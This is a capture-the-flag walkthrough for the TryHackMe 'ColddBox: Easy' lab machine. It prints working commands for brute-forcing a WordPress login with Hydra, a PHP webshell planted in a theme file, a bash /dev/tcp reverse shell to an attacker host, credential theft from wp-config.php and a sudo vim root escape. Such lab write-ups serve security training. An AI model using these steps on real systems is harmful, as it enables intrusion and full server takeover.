4 min read

TryHackMe ColddBox: Easy Writeup

TryHackMe ColddBox: Easy Writeup

Room Info

Walkthrough

Step 1: Initial Recon - Nmap Scan

First, let's run a port scan against the target:

rustscan -a 10.201.10.88 -b 2000 -t 2000 -- -A -sV -sC

Scan results:

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

Findings:

HTTP (80) - Apache + WordPress 4.1.31
SSH (4512) - SSH on a non-standard port

Step 2: Directory Enumeration - Discovering Hidden Users

Use Gobuster to scan for hidden directories:

gobuster dir -u http://10.201.10.88 -w /usr/share/wordlists/dirb/common.txt

Directories found:

/hidden               (Status: 301) ⭐
/wp-admin             (Status: 301)
/wp-content           (Status: 301)
/wp-includes          (Status: 301)

Visit the /hidden directory:

curl http://10.201.10.88/hidden

Content:

U-R-G-E-N-T

C0ldd, you changed Hugo's password, when you can send it to him so he can continue uploading his articles.

Philip

Key information:

💡 Three potential users identified: c0ldd, hugo, philip
💡 The note suggests c0ldd is the admin (he changed Hugo's password)

Step 3: WordPress Password Brute Force

Use Hydra to brute-force the password for the c0ldd user:

hydra -l c0ldd -P /usr/share/wordlists/rockyou.txt 10.201.10.88 \
  http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect" \
  -t 16 -V -f

Brute-force in progress:

[ATTEMPT] target 10.201.10.88 - login "c0ldd" - pass "123456"
[ATTEMPT] target 10.201.10.88 - login "c0ldd" - pass "password"
...
[80][http-post-form] host: 10.201.10.88   login: c0ldd   password: 9876543210
[STATUS] attack finished for 10.201.10.88 (valid pair found)

Credentials found! 🎉

💡 Credentials: c0ldd:9876543210

Step 4: Plant a Webshell via the WordPress Backend

Log in to WordPress:

http://10.201.10.88/wp-login.php
Username: c0ldd
Password: 9876543210

Once logged in, go to Appearance → Editor → 404.php

Insert a simple PHP reverse shell (at the very top of the file):

<?php
if(isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?>

Click Update File to save.

Test command execution:

curl "http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=id"

Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command execution achieved! ✅

Step 5: Or Get a Reverse Shell (Optional)

Start a listener on your attacking machine:

# Windows PowerShell
ncat -lvnp 4444

Trigger the reverse shell payload through the webshell:

curl "http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/YOUR_IP/4444%200%3E%261%27"

Or just visit it directly in the browser:

http://10.201.10.88/wp-content/themes/twentyfifteen/404.php?cmd=bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Shell obtained! 🎉

Stabilize the shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Step 6: Lateral Movement (www-data → c0ldd)

Explore the WordPress config file:

cat /var/www/html/wp-config.php | grep -i password

MySQL password found:

define('DB_USER', 'c0ldd');
define('DB_PASSWORD', 'cybersecurity');

Key finding:

💡 MySQL password: cybersecurity
💡 Try a password-reuse attack!

Switch to the c0ldd user:

su c0ldd
# Password: cybersecurity

It works! 🎉

whoami
# c0ldd

id
# uid=1000(c0ldd) gid=1000(c0ldd) groups=1000(c0ldd)...

Grab the user flag:

cd ~
cat user.txt

Flag content:

Redacted==

Decode the Base64:

echo "RmVsaWNpZGFkZXMsIHByaW1lciBuaXZlbCBjb25zZWd1aWRvIQ==" | base64 -d
# Felicidades, primer nivel conseguido!
# (Congratulations, first level completed!)

Step 7: Privilege Escalation (c0ldd → root)

Check sudo privileges:

sudo -l

Output:

User c0ldd may run the following commands on ColddBox-Easy:
    (root) /usr/bin/vim
    (root) /bin/chmod
    (root) /usr/bin/ftp

Key finding:

⭐ c0ldd can run vim, chmod, and ftp via sudo
💡 All of these can be abused to escalate to root!

Escalating with vim

sudo vim -c ':!/bin/sh'

Root shell obtained! 🎉

whoami
# root

id
# uid=0(root) gid=0(root) groups=0(root)

Grab the root flag:

cd /root
cat root.txt

Flag content:

Redacted=

Decode:

echo "wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=" | base64 -d
# ¡Felicidades, máquina completada!
# (Congratulations, machine completed!)

Done! 🏆

Key Takeaways

1. WordPress Password Brute Force

# Hydra
hydra -l USER -P rockyou.txt TARGET \
  http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect" -t 16 -f

# WPScan
wpscan --url http://TARGET -U USER -P rockyou.txt

2. Password Reuse Check

cat /var/www/html/wp-config.php | grep password

Lessons Learned

On Step 3: WordPress Password Brute Force

At first I used Burp Suite to brute-force out hugo and philip, and I hadn't found the /hidden path at all. After brute-forcing for a while with no luck, I went back to hunt for more information — I remembered that these are the usual WordPress paths, so you have to adjust your approach depending on the situation.

On Step 7: Privilege Escalation (c0ldd → root)

There are actually several privilege-escalation methods here — feel free to try them all! For details, check out:

GTFOBins